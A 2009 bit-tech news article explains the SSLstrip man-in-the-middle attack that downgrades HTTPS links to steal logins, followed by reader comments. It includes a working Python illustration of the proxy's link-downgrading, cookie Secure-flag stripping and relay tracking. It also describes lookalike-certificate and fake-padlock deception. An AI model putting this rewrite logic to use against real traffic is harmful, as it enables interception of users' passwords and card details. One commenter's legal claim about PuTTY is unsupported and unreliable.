bit-tech.net

Hacker creates SSLstrip package


SSL connections are the cornerstone of ecommerce - but hacker Moxie Marlinspike has a tool for breaking them wide open.

If you think that your connection to websites is secure, new research might give you cause to think otherwise.

According to an article on The Register, the hacker known as Moxie Marlinspike (an alias, obviously) used this week's Black Hat DC security conference to unveil a new attack against Secure Sockets Layer (SSL) connections to web sites.

Dubbed “SSLstrip,” the attack is a form of man-in-the-middle attack that can be mounted from anywhere the attacker can sit between the victim's browser and the web server: on publicly accessible WiFi networks, on onion-routing networks like Tor (by running an exit node), and on local area networks that share a single gateway to the Internet (where the attacker can pull traffic through their own machine, for example by ARP spoofing). Sitting between client and server, the package leaves the user believing that a secure connection to the website has been opened while it actually relays user names, passwords and credit card details in plain text.

According to Marlinspike's presentation, the attack exploits the way most sites are deployed. Because SSL puts a strain on server hardware, taking far longer to serve than an unencrypted connection, most websites serve the bulk of their content over plain HTTP and only switch to SSL when private information is about to be transmitted in either direction. That means a visitor's first request to a site (typing a domain into the address bar, following a link from elsewhere) is almost always unencrypted, and the browser keeps no record that the site ought to be reached over HTTPS; the only thing that would carry the user onto a secure connection is a link or redirect delivered over that unencrypted link, which the attacker can see and modify.

SSLstrip watches that plaintext traffic and rewrites every secure link and redirect it sees, changing https:// (port 443) to http:// (port 80) before the page reaches the browser, so the browser submits its forms, log-in credentials included, over the unencrypted link. The tool remembers which links it downgraded and opens a genuine HTTPS connection to the real site for each of them, relaying requests and responses in both directions. The website therefore sees a normal, fully encrypted session and never generates an error message, while the user's half of the exchange travels in plain text.
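The mechanism described above, as an added illustration (the editor's own Python, not sslstrip's source): a proxy that downgrades the site's redirects and links, strips the Secure attribute from the session cookie so the browser will keep sending it over plain HTTP, and records per client which links were downgraded so it knows which http:// requests to relay upstream over HTTPS. The hostnames, cookie and client address are constructed for the demonstration; there is no network I/O.

```python
"""Editor's illustration of the SSLstrip rewrite; not the sslstrip source.

Model: the browser talks plain HTTP to this proxy, the proxy talks HTTPS to
the real site.  Every https:// reference in what the site sends back is
rewritten to http:// and remembered per client, so that when the browser
later requests that http:// URL the proxy knows to relay it over HTTPS.
No network I/O: the requests and responses are constructed by hand.
"""
import re
from typing import Dict, List, Set, Tuple

Headers = List[Tuple[str, str]]

# An https:// URL up to the first character that cannot belong to one.
HTTPS_URL = re.compile(r"https://[\w\-.:@%/;$()~+=&#?]*", re.IGNORECASE)
# The Secure attribute of a Set-Cookie header; left in place, the browser would
# refuse to send the cookie over the plaintext link it has been forced onto.
SECURE_ATTR = re.compile(r";\s*secure(?=;|\s*$)", re.IGNORECASE)


class StripProxy:
    """Rewrites origin responses and records which links were downgraded."""

    def __init__(self) -> None:
        # client address -> http:// URLs that the site originally sent as https://
        self.stripped: Dict[str, Set[str]] = {}

    def _downgrade(self, client: str, https_url: str) -> str:
        http_url = "http://" + https_url[len("https://"):]
        # In HTML the ampersand is escaped; the browser's later request will not be.
        self.stripped.setdefault(client, set()).add(http_url.replace("&amp;", "&"))
        return http_url

    def rewrite_response(self, client: str, status: int, headers: Headers,
                         body: bytes) -> Tuple[int, Headers, bytes]:
        """Downgrade every https:// reference the site sent to this client (text bodies only)."""
        def sub(match):
            return self._downgrade(client, match.group(0))

        new_headers: Headers = []
        for name, value in headers:
            lname = name.lower()
            if lname == "location":
                # An HTTP-to-HTTPS redirect is the site's own defence; rewriting
                # it is what keeps the browser from ever reaching port 443.
                value = HTTPS_URL.sub(sub, value)
            elif lname == "set-cookie":
                value = SECURE_ATTR.sub("", value)
            elif lname == "content-length":
                continue  # body length changes; recomputed below
            new_headers.append((name, value))
        text = HTTPS_URL.sub(sub, body.decode("utf-8", errors="replace"))
        new_body = text.encode("utf-8")
        new_headers.append(("Content-Length", str(len(new_body))))
        return status, new_headers, new_body

    def upstream_url(self, client: str, request_url: str) -> str:
        """URL the proxy should fetch from the site for a browser request."""
        if request_url in self.stripped.get(client, set()):
            return "https://" + request_url[len("http://"):]
        return request_url  # never downgraded for this client: leave as-is


if __name__ == "__main__":
    proxy = StripProxy()
    # Constructed responses from an imaginary site, as seen by the proxy.
    redirect = proxy.rewrite_response(
        "10.0.0.5", 301,
        [("Location", "https://login.example.test/account"),
         ("Set-Cookie", "sid=abc123; Path=/; Secure; HttpOnly")], b"")
    page = proxy.rewrite_response(
        "10.0.0.5", 200, [("Content-Type", "text/html")],
        b'<form action="https://login.example.test/submit?x=1&amp;y=2">')
    print(redirect[1])
    print(page[2])
    print(proxy.upstream_url("10.0.0.5", "http://login.example.test/account"))
```

The Location rewrite is the part worth dwelling on: a site that answers every plain-HTTP request with a redirect to HTTPS is relying on exactly the response this proxy edits, so the redirect on its own buys nothing against an attacker in the path.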

Where the tool gets clever is in an optional mode in which the proxy presents the browser with a certificate that is genuinely valid, but for a domain the attacker controls rather than for the site being impersonated. The connection between the browser and the SSLstrip server is then encrypted with credentials the browser accepts, so the certificate warnings that normally defend against a man-in-the-middle are never triggered; the user sees an “https://” address belonging to the attacker's host, chosen to resemble the real one, and that oh-so-reassuring padlock symbol, which the tool can supply simply by serving a padlock image as the site's favicon.

The attack, which has been tested against both Firefox and Safari, isn't a mere proof of concept either: Marlinspike ran the package on a Tor exit node, which sees in the clear whatever unencrypted traffic Tor users route through it, and gathered 254 passwords for supposedly secure sites including Gmail, Ticketmaster and PayPal over the course of a single day.

So far there is no real solution to the problem of SSL man-in-the-middle attacks aside from, as Marlinspike himself states, to “encrypt everything”, something that will require webhosts to invest in significantly more powerful hardware. Even that is not sufficient on its own: a site that answers every HTTP request with a redirect to HTTPS still sends that redirect in plain text, where SSLstrip can rewrite it, so the browser itself has to know never to talk plain HTTP to the site in the first place.

Does the knowledge that a simple tool for sniffing your SSL-protected details exists give you cause for alarm, or is the likelihood of someone being in a position to run a man-in-the-middle attack so low that the SSLstrip package is nothing more than an interesting toy? Share your thoughts over in the forums.

9 Comments

n3mo 20th February 2009, 15:10
Those attacks were tested some time before, very effective indeed. The main problem is that since the beginning ISPs should have invested in full-scale encryption systems. They didn't, because it was "too expensive". Well, now we pay for that.
perplekks45 20th February 2009, 16:50
We can only wait for the first class action filed in the US against [enter ISP name here] and within just 2-5 years ISPs will sort their hardware problems out...
Redbeaver 20th February 2009, 17:06
that is indeed a very interesting toy.......
n3mo 20th February 2009, 17:38
Quote:
Originally Posted by perplekks45
We can only wait for the first class action filed in the US against [enter ISP name here] and within just 2-5 years ISPs will sort their hardware problems out...

Well, not really. Governments don't like encryption at all - in England even using Putty is illegal. (I know, this is so dumb... it's even hard to phrase how dumb it is, actually)
perplekks45 20th February 2009, 19:13
Putty is illegal? Great! That reminds me of the German government trying to pass a law making the use of vulnerability scanners illegal. And how exactly would companies be able to find vulnerabilities after that? Testing for them manually? Great idea. :D
boiled_elephant 20th February 2009, 22:49
I excreted bricks. That is a very, very worrying discovery. Proof positive, though, that Black Hat is actually a useful convention - imagine if the first person to discover this had been a genuine crook?
dyzophoria 22nd February 2009, 07:41
so from what I'm understanding, since this is a man-in-the-middle attack, this would only be possible with public WiFi hotspots, right?
Timmy_the_tortoise 22nd February 2009, 13:58
They'd better fix this soon.
[USRF]Obiwan 23rd February 2009, 07:33
To be honest the real let-down is that you have to pay so much money for an SSL license. It can hook up one domain or IP address. For a web server hosting multiple sites this is a terrible construction.